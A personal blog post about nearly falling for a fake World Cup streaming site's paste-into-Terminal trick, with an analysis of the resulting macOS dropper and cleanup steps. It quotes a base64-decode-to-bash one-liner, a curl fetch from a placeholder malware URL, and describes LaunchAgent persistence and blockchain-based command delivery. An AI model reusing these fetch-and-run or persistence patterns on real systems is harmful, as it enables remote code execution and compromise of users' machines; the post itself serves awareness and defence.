← Back to blog

Almost Got Hacked!

I almost got hacked today. I was looking for a free online stream of the FIFA World Cup 2026, found a shady website, and did exactly what it told me to do. In my defense, kickoff was soon.

How it started

The site claimed to stream the World Cup for free and walked me through four steps:

  1. Press cmd + space
  2. Type terminal and press enter
  3. Press cmd + V to paste (no mention of when anything was copied to my clipboard)
  4. Press enter

Any rational person would have stopped. I didn't — I was too eager to watch the match to think clearly.

What I pasted

The clipboard held something like:

Bash
bash "echo "<some short base64 string>" | base64 -d | bash"

I pasted it and pressed enter. macOS immediately flagged it as malware and blocked it. No harm was done to my system.

That's when I learned about XProtect — Apple's built-in anti-malware system. It keeps a signature list of known malicious scripts and blocks matches before they run. This one was already in the database, which is the only reason nothing bad happened.

Going down the rabbit hole

By then I had completely forgotten about the World Cup.

I ran history to recover the command. Nothing — the script never executed, so there was nothing to find.

Decoding the base64 manually gave me something like this (the link is fake here, but it's real in the actual script):

Bash
curl -fsSL https://example.com/malware.sh

I fetched the script without executing it:

Bash
curl -fsSL https://example.com/malware.sh | cat

The output was an osascript command wrapping another large base64 payload. Claude declined to analyze it, citing security policy. ChatGPT did. Here's what it found.

What the malware does

A multi-stage macOS dropper: AppleScript, persistent LaunchAgent, and the Polygon blockchain as a command-delivery channel.

Stage 1 — Persistence. Creates ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist and registers it with launchctl. The plist sets RunAtLoad (runs at login) and KeepAlive (relaunches if killed).

Stage 2 — Obfuscated payload. The LaunchAgent runs echo '<base64>' | base64 -d | osascript. The AppleScript rebuilds strings character by character — (character id 112) & (ASCII character 111) & ... — to evade static analysis.

Stage 3 — Blockchain C2. The script hits Polygon RPC endpoints (polygon.drpc.org, polygon.publicnode.com, polygon-mainnet.gateway.tatum.io, tenderly.rpc.polygon.community), trying each in sequence. It sends a JSON-RPC eth_call to a hard-coded smart contract, extracts the hex result (0x...), decodes it to text, and pipes it into osascript:

Text
Polygon RPC → eth_call → hex response → decode → osascript → execute

The attacker can change behavior anytime by updating what the contract returns — no traditional C2 server, and the on-disk payload never needs updating.

Verdict: persistent macOS backdoor with remote code execution, using Polygon RPC as command transport. High severity. The blockchain layer delivers attacker commands, not just wallet reconnaissance.

If you ran this script

Look for these:

Bash
ls ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
ls ~/Library/ifipbqmfnnywqguz
launchctl list | grep ifipbqmfnnywqguz

If you find them, do this:

Bash
launchctl unload ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist
rm ~/Library/LaunchAgents/com.ifipbqmfnnywqguz.plist

Also check for similarly named random directories under ~/Library/.

What I took away

Simple social engineering — urgency plus a plausible streaming site — almost worked on someone who knows what a terminal is.

  • Don't paste commands into Terminal because a website told you to.
  • base64 -d | bash is almost never something a legitimate site needs you to run.
  • XProtect helped, but it only covers known signatures. New variants can slip through.

Glad the script was blocked, glad I understood what it would have done, and glad I can share this from an uncompromised laptop. Shoutout to Apple for protecting me from myself, and to ChatGPT for analyzing the script.

Now I'm going to watch the World Cup the legal way.

Until next time!